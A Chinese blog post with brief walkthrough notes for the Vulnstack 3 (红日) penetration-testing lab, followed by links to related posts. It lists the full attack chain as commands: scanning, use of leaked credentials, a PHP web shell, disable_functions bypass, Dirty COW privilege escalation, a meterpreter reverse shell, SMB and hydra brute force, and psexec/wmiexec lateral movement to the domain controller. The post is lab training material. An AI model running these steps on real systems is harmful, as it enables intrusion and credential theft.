ATT&CK 红日靶场(三)-简记

最新推荐文章于 2024-02-02 23:50:40 发布
最新推荐文章于 2024-02-02 23:50:40 发布
阅读量1k 收藏
点赞数
分类专栏: 网络安全之路 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhoufeiy/article/details/131331703
版权

Step 1-》信息收集

端口

nmap -p -A -sV 192.168.1.110

目录

dirsearch -u 192.168.1.110 --exelude-status 400,401,403,404,501,503

访问 ip/1.php -->根目录、禁用函数

ip/robots.txt

!!!-------

IP/administrator-->>joomla-cms

IP/configuration.php~-->>发现 testuser / cvcvgjASD!@

Step》--》MySQL

mysql -h 192.168.1.110 -u testuser -p

->am2zu_users->select *from am2zu_users;

更改密码->>123456

update am2zu_users set password = md5("123456") where id =891;

----》登录CMS

------------

Step 》写马->>eval($_POST['123']);

-》访问error.php

192.168.1.110/templates/beez3/error.php

STEP 》》

--antsward 连接后无法执行命令:

antsward-》加载插件-》辅助工具-》绕过disable_fuctions-》PHP7_GC_UAF 、PHP7_Backtrace_UAF

disable_functions 插件绕过

GitHub - yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD: bypass disable_functions via LD_PRELOA (no need /usr/sbin/sendmail)

-> 命令执行成功

ifconfig

whoami

uname -a

文件泄露-》tmp/mysql/test.txt--》adduser/passwd、wwwuser/wwwuser_123Aqx

-------

权限提升-漏洞

登录ssh成功

ssh  -oHostKeyAlgorithms=+ssh-dss wwwuser@192.168.1.110

本地->git clone CVE-2016-5195

---》将dirty.c 下载到目标host

--》gcc -pthread dirty.c -o dirty -lcrypt  //编译

--》rm /tmp/passwd.bak  //删除之前做过的文件

--》./dirty  123456  //执行脚本,添加用户密码

MSFvenom -》shell.elf --> chmod +x shell.elf -->

监听:

mfs-exploit/multi/handler

set payload linux/x64/meterpreter/reverse_tcp

set lhost 192.168.1.106

set lport 6666

run

内网渗透

# 添加路由

run autotoute -s 192.168.93.0/24

探测主机

use auxiliary/scanner/smc/smb_version

set rhosts 192.168.93.0/24  

run

----》发现192.168.93.10 WIN-8GA56TNV3MV

----》192.168.93.20 WIN2008

----》WIN7

本地配置代理

 use auxiliary/scanner/smb/smb_login 爆破smb 192.168.93.30

proxychains  hydra -l admin -P ./pass.txt 192.168.93.20  爆破 192.168.93.20

---------------------------------

psexec攻击

192.168.93.30

use exploit/windows/smb/psexec

set payload windows/x64/meterpreter/bind_tcp

set SMBUser admin

set SMBPass 123456

set rhost 192.168.93.30

run

------------------

查找域控

run post/windows/gather/enum_domain

------

impacket包里的vmiexec.py攻击192.168.93.20

proxychains python3 wmiexec.py 'admin:123456@192.168.93.20'

攻击域控:

proxychains python3 wmiexec.py 'administrator:zxcASDqw123!!@192.168.93.10'

 

关云chnag
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
红日安全靶场3
weixin_48169878的博客
07-13 4103
环境准备 1、所有虚拟机已经自动挂起。且内网网段为192.168.93.0\24,外网网段为dhcp,不需要更改2、修改VMnet2的ip为192.168.93.0网段,没有就创建。因为校园网问题,桥接模式无法上网,为了方便,外网网卡改为net模式,并配置192.168.1.0网段,如下所示:修改kail的ip以及dns扫出来......
ATT&CK红队评估(红日靶场
weixin_45682839的博客
04-25 3391
ATT&CK红队评估(红日靶场)通关,拿下所有五台主机,包括:Centos、Ubantu、Windows xp、Windows 2008、Windows 2012
ATT&CK实战系列-红队评估 (红日靶场3)Vulnstack层网络域渗透靶场
qq_47289634的博客
08-01 1046
靶场地址打开虚拟机镜像为挂起状态,第一时间进行快照,部分服务未做自启,重启后无法自动运行。挂起状态,账号已默认登陆,centos为出网机,第一次运行,需重新获取桥接模式网卡ip。除重新获取ip,不建议进行任何虚拟机操作。参考虚拟机网络配置,添加新的网络,该网络作为内部网络。注:名称及网段必须符合下面图片,进行了固定ip配置。
红日靶场】vulnstack3-完整渗透过程
信安是不可或缺的一部分!
10-07 517
绕过:https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD。现在做内网穿透将这台主机代理出来:我测试我这有问题(我的环境有安全设备拦截了msf的流量)再次横向到30主机:(失败)443gg了,应该是授权的问题,这个win7太久没用了激活掉了。脏牛:https://github.com/Rvn0xsy/linux_dirty。还有其他方式可以横向这个看自己爱好,这次先到这,拿到后可以权限维持,这里不在赘述。
VulnStack-ATT&CK-3(红日靶场
buffedon的博客
07-12 8504
VulnStack-ATT&CK-31. 环境配置2. 信息收集目标机端口扫描目录扫描3. 漏洞利用远程连接web的MySQL登录后台写一句话木马连接木马文件getshell4. 内网渗透内网信息收集脏牛漏洞提权内网渗透,建立监听路由转发Sock代理Socks5代理5. 横向移动NTLM Relay 攻击定位域管理员meterpreter的kiwi模块抓取密码使用获取到的密码控制 win7进攻域控(win 2012)6. 问题总结 1. 环境配置 此图仅供参考,IP地址有误 首先添加一张网卡(仅主
红日ATTCK VulnStack靶场
xhscxj的博客
08-14 365
1.扫描DMZ机器端口2.进行ssh和3306爆破无果后访问web服务3.已知目标是Joomla,扫描目录4.有用的目录分别为1.php5.configuration.php~中泄露了数据库密码6.administrator为后台登录地址7.直接连接mysql8.找到管理员表,密码加密了9.百度joomla密码的加密方式以及重置方式,用下面的方式添加新的管理员用户10.重置密码后登录后台11.搜索相关漏洞,用这个后台RCE12.访问后并没有回显。
红日(vulnstack)3 内网渗透ATT&CK实战
m0_66299232的博客
03-11 1597
蚁剑成功连接后无法执行命令,disable_functions插件,权限提升-脏牛漏洞,用msfvenom生成木马文件,msf开启监听,执行木马文件,成功反弹shell到msf上 use exploit/multi/handler set payload linux/x64/meterpreter/reverse_tcp set LHOST 192.168.1.106 set LPORT 1106 run 使用use auxiliary/scanner/smb/smb_login模块,进行smb爆破
内网渗透—红日靶场
一个普普通通的博客
04-23 5252
红日靶场—红队实战,内网渗透
红日靶场】3——从靶场配置到漏洞发现、脏牛提权、反弹shell详细解出
m0_62783065的博客
03-16 1236
红日靶场】3——从靶场配置到漏洞发现、脏牛提权、反弹shell详细解出
红日内网打靶记录】红日3打靶(下)
weixin_54603520的博客
05-19 370
注意:蚁剑连接后无法执行命令时因为系统设置了函数黑名单,这里使用的时bypass插件去继续进行,我们也可以考虑使用哥斯拉或者蚁剑,因为这两个工具的传输是加密的,应该是可以直接执行命令的。这里发现查询到的ip并不是我们拿下的机器的IP,应该是什么软件流量代理造成的。所以我们这里查询出来的结果是其他端口。这里成功执行,并且帮我们创建了一个新的账号,我们可以直接设置密码,重新登录达到提权的目的。查询当前拿下的机器网络连接情况,这里发现了一个与其建立连接的机器,应该是通过93.100的机器去做代理的。
ATT&CK中文手册.zip
11-24
一、Initial Access(入口点) 二、Execution(命令执行) 、Persistence(持久化) 四、Privilege Escalation(权限提升) 五、Defense Evasion(绕过防御) 六、Credential Access(获取凭证) 七、Discovery(基础信息收集) ...
内网渗透实战——红日ATT&CK系列靶场(一)学习笔记_红日靶场1攻略-CSDN博客.html
最新发布
05-11
内网渗透实战——红日ATT&CK系列靶场(一)学习笔记_红日靶场1攻略-CSDN博客.html
ATT&CK手册(修改版)
09-16
ATT&CK手册(修改版)
ATT&CK框架介绍及战技术对照表
05-18
ATT&CK框架介绍及战技术对照表
红日打靶!!!
woshicainiao666的博客
02-02 725
网站的IP地址明明是192.168.0.101,但是ip a命令,看到IP地址是192.168.93.120。>在/tmp/mysql/test.txt中发现账号密码 wwwuser/wwwuser_123Aqx。web-cenctos,开启后要输入/etc/init.d/network restart 重启网卡。将文件中的bypass_disablefunc.php上传到网站根路径/var/www/html/将bypass_disablefunc_x64.so上传到/var/www/下。
ATT&CK红日3靶机渗透攻略
weixin_47311099的博客
01-27 5921
ATT&CK红队评估攻略 下载链接:http://vulnstack.qiyuanxuetang.net/vuln/detail/5/ 启动:直接恢复运行,不建议重启!注意由于靶场封装时桥接的ip可能跟当前IP段不一样,故而需要在centos靶机中输入 service network restart 重启网卡 信息收集 nmap扫描 nmap -sS -sV 192.168.111.0/24 开放了http80 ssh22 mysql3306 网站信息收集 通过wapplayzer插
红日靶场系列】ATT&CK红队评估3
weixin_45632448的博客
09-14 1209
IPC(Internet Process Connection)是共享“命名管道”的资源,它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。连接成功,这里虽然找到了管理员的账号密码,但是密码是被加密的,而加密方式也并不知道(其实一般的网站后台账号的加密方式是MD5,这种的就可以直接将“123456”进行加密把他的替换掉,就可以登陆了,前提是要备份一下他原先的密码;但是这种就不能使用这种方式了)
红日靶场(vulnstack)一 超全面详细的渗透测试学习笔记
热门推荐
qq_41821603的博客
11-24 5万+
这里写目录标题一、环境搭建二、拿下web服务器2.1 信息收集 一、环境搭建 实验环境拓扑如下: windows2008 域控 (host-only) windiws 7 web服务器 (双网卡 host-only + NAT) windows 2003 域内PC (host-only) 二、拿下web服务器 2.1 信息收集 ...
ATTCK框架实践指南
08-05
根据引用,MITRE在2018年将Pre-ATT&CK集成到Enterprise ATT&CK版本中,并将Pre-ATT&CK的“启动”和“威胁应对”战术纳入Enterprise ATT&CK的“初始访问”战术中。而据引用,MITRE的Ingrid Parker与ATT&CK团队合作...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值